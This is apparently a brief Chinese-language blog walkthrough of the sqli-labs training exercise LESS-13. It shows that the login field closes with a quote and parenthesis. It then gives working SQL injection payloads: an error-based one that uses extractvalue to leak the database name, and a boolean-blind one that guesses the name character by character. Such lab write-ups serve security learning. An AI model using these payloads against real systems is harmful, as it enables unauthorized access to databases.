LESS-13
源码:
输入:admin’,出现错误提示,可以知道sql注入中是用’)闭合。
输入:admin’)#
因为这里有报错,所以可以用报错注入
admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))#
布尔注入:
admin’) and left(database(),1)>‘a’#(可以用二分法进行猜测)
LESS-13
最新推荐文章于 2023-07-24 10:01:00 发布